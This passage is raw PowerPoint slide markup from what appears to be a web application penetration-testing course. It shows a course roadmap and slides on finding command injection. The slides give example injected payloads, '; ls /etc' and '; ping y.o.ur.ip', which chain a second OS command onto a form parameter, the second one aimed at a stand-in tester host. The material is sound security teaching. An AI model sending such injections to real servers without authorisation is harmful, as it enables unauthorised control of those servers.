          <p:cNvPr id="12" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</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lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1371600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Command injection is less common in modern apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This allows us to input operating system commands through the web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Commands sent in are geared to two types of results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Local Results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Remote Results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Pick commands based on server OS determined during mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Command injection provides control of the server to the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Running within the privileges of the web application</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Discovering Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1066800"/>
            <a:ext cx="8686800" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Command injection involves parameters used in OS commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Such as web-based utilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The tester should examine all parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>But focus on ones that appear to be used on the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>New accounts require a directory to store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>configs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Application accepts the following parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>It then runs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> username</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19393871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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Command Injection Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107523" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1440180"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The injection will cause one of two types of results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We want to select our commands based on which of the two is returned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Visible Results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Use when results are returned to the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Directory Listing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>; ls /etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>; ends previous command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>ls /etc lists the files in the etc directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Blind Results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Use when results aren'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>t displayed in the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Ping yourself!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>; ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>y.o.ur.ip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Run a sniffer on your network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Look for ICMP echo requests from the target</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041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
